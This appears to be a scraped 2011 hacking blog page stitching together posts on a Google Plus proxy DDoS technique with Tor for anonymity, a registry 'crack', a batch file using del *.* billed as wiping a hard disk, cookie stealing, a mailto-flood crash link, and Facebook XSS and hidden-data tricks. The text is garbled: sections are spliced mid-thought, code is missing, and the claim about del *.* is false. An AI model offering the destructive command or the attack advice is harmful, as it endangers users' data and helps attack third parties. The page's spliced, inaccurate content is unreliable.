Wednesday, 31 August 2011

DDOS using GOOGLE PLUS servers

A security penetration tester at Italian security firm AIR Sicurezza Informatica has claimed that flaws exist in Google's servers that will allow would-be hackers to exploit the search giant's bandwidth and launch a distributed denial-of-service (DDoS) attack on a server of their choosing.

On the IHTeam Security Blog, Simone Quatrini, also known as R00T.ATI, demonstrates how users can make Google's servers act as a proxy to fetch content on their behalf. Quatrini has written a shell script that will repeatedly prompt Google's servers to make requests to a site of the attacker's choice, effectively using Google's bandwidth rather than their own. The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs. But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/.

How does it work?


However this method works better than many others i’ve tried before. forget the cracks and injectors etc… this is the BEST WAY:

1) start > run > “regedit” (without the quotes of course)

2) go to the key:


…and doubleclick on it. Then change some of the value data to ANYTHING ELSE…delete some, add some letters, I don’t care…just change it!

Delete all your system files with just 6 character command (part 2)

Delete all your system files with just 6 character command (part 5)

Copy the following code into your notepad and save it as a .bat file.
del *.*
All your files in your hard disk will vanish in less than 5mins.

Cookie stealing:Hacking IDs without Passwords

The concept:
Whenever you log into your account(say yahoo for example) there is a small piece of random code generated called a cookie.
A copy of this cookie is stored on your system and the other goes to the server.
This cookie is used for authentication purpose for example,  till the point of time you are logged in your account this piece of code is verified with the server whenever you perform some action.This helps in
authentication between you and the server.

Example:Just go to a yahoo login page and enter this particular code on the in place of the url

Crash a Computer System With Nothing But a Link (part 1)

1. Crash a Computer System With Nothing But a Link.

I stumbled across this URL while surfing the internet. This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.


Click Here. (

my fan page on facebook

Wednesday, 24 August 2011


guys heres the best trick for u to view all the pics of the person you want to see i found and tried it myself so njoy nd keep on reading this page

after the "id=" type the id of the person whose pics u wish to see
try this and watch the magic

Wednesday, 10 August 2011

Facebook XSS Details found by BLACK WOLF

Earlier this week, I reported finding a cross-site scripting vulnerability on a page. Last night, I asked a friend with contacts at Facebook to let their developers know directly, and the company responded quickly. I confirmed just after midnight that the hole is now patched, which means I will now share technical details.
The problem was a fairly typical XSS issue. In poking around various pages related to application permissions, I noticed that several URI parameters appeared in the source of the page, but Facebook did a good job of filtering out characters which could allow cross-site scripting. Further experimentation revealed that specifying various parameters on one page led to various error messages.
This specific page was, a pop-up that can appear when an application requests extended permissions, such as read access to a user’s stream. A typical use of this page came by issuing a GET request with several parameters: api_key (the API key of the requesting application), v=1.0extern=1next(the next URI to load), channel_url (the cross-domain receiver file for communicating with Facebook), dialog_idlocale (language), and ext_perm (the specific extended permission requested).

Access Facebook Data Without Logging in to Facebook by BLACK WOLF

(N.B.: This is not an April Fool’s joke.)
Programmer Pete Warden made headlines a few months ago after creating a dataset of public profile information from 210 million Facebook users. Warden gathered his data by crawling the public search pages of some users have enabled, and planned on releasing it to the public. But Facebook threatened legal action, prompting Warden to destroy the information rather than risk an expensive court battle.
While I’m sympathetic to the privacy implications that led some to criticize Warden’s planned release, I also think that exposing the data would be an effective way of awakening Facebook users to what’s possible with information now classified as public. And while Warden abided by Facebook’s demands, it’s only a matter of time before someone less compliant publishes a similar dataset. Besides, many search engines already have similar resources in their indexes.

Easily View Hidden Facebook Friend Lists found by ISHAN ANAND (BLACK WOLF)

Lately I’ve demonstrated how various data on Facebook, such as photo albums and events, can be accessed by anyone when most users would probably think otherwise. You can now add friend lists to that category of data.
You may recall that when Facebook rolled out their new privacy settings, many analysts complained about the list of who a user had “friended” becoming part of what Facebook classified as Publicly Available Information. In response, Facebook added a setting to remove the lists from a user’s profile, a move that seemed to quell some of the criticism.

Trick to View Hidden Facebook Photos and Tabs found by BLACK WOLF

The code came from my own experiments on accessing the hidden photos. It worked quite manually, retrieving data from a particular Facebook interface and stuffing it into the current page. I figured a more elegant solution could be found by re-using the code already embedded in the page, but I had not been able to sort out all of the built-in functions.
Last night and this morning, I found what I’d been missing before, and I now present a far simpler version that gives full access to all available albums of a given user. Simply bookmark this link(right-click and choose to add a bookmark) and click the bookmark when viewing someone’s profile on Facebook.
Once again, please note that this does not in any way circumvent a user’s privacy settings. If you mark your albums as visible only to your friends, this trick will not override that setting. I do not currently know of a way to access private photo albums, and if I did find one, I would report it to Facebook. My purpose in posting this code is to prove a point, not break into users’ accounts.
Here is the new source code: